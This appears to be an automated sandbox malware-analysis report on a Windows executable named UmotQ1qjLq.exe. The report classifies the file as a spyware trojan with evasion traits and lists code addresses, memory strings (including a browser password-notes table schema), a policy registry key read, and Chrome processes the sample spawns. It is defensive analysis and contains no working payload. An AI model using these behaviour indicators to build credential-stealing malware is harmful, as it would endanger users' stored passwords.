Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A6C0DC	0_2_06A6C0DC
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A6801E	0_2_06A6801E
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4601D	0_2_06A4601D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A54867	0_2_06A54867
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4E84A	0_2_06A4E84A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A49185	0_2_06A49185
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4D186	0_2_06A4D186
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A541FB	0_2_06A541FB
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A509C7	0_2_06A509C7
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A459D6	0_2_06A459D6
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4C9DE	0_2_06A4C9DE
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4F160	0_2_06A4F160
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A6B172	0_2_06A6B172

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: String function: 00B24110 appears 83 times
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: String function: 00B17EE0 appears 44 times

Source: UmotQ1qjLq.exe, 00000000.00000003.2057515288.000000000660D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2055850944.00000000064C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2045024179.0000000006576000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2054886680.00000000065F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2040776815.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2053154515.00000000065DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2045572032.0000000006598000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2046202332.00000000064B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2046904722.00000000064BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043059645.000000000656A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2049966771.00000000064BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2051607256.00000000064B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2048168450.00000000064BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041206128.0000000005E36000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2052705557.00000000065CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042754453.000000000655E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2053902321.00000000066FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2046078028.0000000006673000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041557544.0000000005F17000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043164805.00000000064C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2049524123.00000000064BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041403814.00000000060B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041206128.0000000005D54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044542000.00000000064B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041866823.00000000064BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2051742976.00000000065D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2051140496.00000000065C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2054667793.00000000064B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072832905.0000000005C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042362239.0000000006560000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072601173.0000000005D16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041967602.0000000006555000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2054508291.00000000065EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2048892842.00000000066B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2049056690.00000000064B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043477204.00000000064BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2054377889.00000000064BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2040959738.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2053479797.00000000065DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2049750496.00000000065C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047029473.0000000006598000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2045770823.00000000064B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2048360940.00000000065A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2054213681.00000000065E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047575109.00000000066A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2057986148.0000000006606000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2056335860.00000000065FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2050447667.00000000066CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043580355.0000000006569000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047287022.00000000064BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047787641.00000000064BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2056174590.00000000064C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042562192.0000000006562000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047413881.00000000065AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2055208534.000000000672F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2056827706.000000000674D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043892945.0000000006578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2045943494.0000000006592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044106423.0000000006578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072411424.0000000005D54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2052855323.00000000066E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044767252.000000000663C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2040959738.0000000005E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2056009087.00000000065FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2053315623.00000000064B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2050624582.00000000064BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041206128.0000000005DC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000002.2162656125.0000000006776000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041660979.00000000064B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042058834.00000000065F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2045239543.000000000664C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000002.2163527121.0000000006A36000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2048537283.00000000064B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2055688118.000000000672E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2050805553.00000000065CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2040776815.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2050228807.00000000065BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043684163.0000000006622000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2046587862.000000000659E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043788099.00000000064BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042459424.00000000064B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2055527938.00000000065EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042163983.0000000005F16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044876724.00000000064B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047156971.000000000667E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2040776815.0000000005D54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044433658.0000000006642000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2046346771.00000000065A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072832905.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072483662.0000000005E36000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2057754458.00000000064B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2050949513.00000000064C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2058225442.00000000064B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2051382582.00000000066E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044214509.00000000064BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2045418980.00000000064C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041766535.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072535649.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2056671698.0000000006601000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044664107.000000000657A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2055370562.00000000064B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043997861.00000000064C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2047960753.00000000065B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2054064473.00000000064BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2048708083.00000000065AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042951718.00000000064C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2053004983.00000000064BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2049306180.00000000065C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2046467557.00000000064BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2056493317.00000000064BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2057304735.00000000064BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2044323200.0000000006580000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2043369239.0000000006575000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2041403814.0000000006130000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042656986.00000000064BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042266080.00000000064C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2052057814.00000000064B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2042853104.000000000660C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs UmotQ1qjLq.exe

Source: UmotQ1qjLq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: UmotQ1qjLq.exe

Static PE information: Section: ZLIB complexity 0.999890779194079

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/66@9/6

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Code function: 0_2_00B419FA CoCreateInstance,

0_2_00B419FA

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: UmotQ1qjLq.exe, 00000000.00000003.1903844496.0000000005C15000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1902849190.0000000005C48000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: UmotQ1qjLq.exe

ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

File read: C:\Users\user\Desktop\UmotQ1qjLq.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UmotQ1qjLq.exe "C:\Users\user\Desktop\UmotQ1qjLq.exe"
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,1303582193937569043,18141116409944036505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1920,i,10785265456503200477,11409985625348319753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
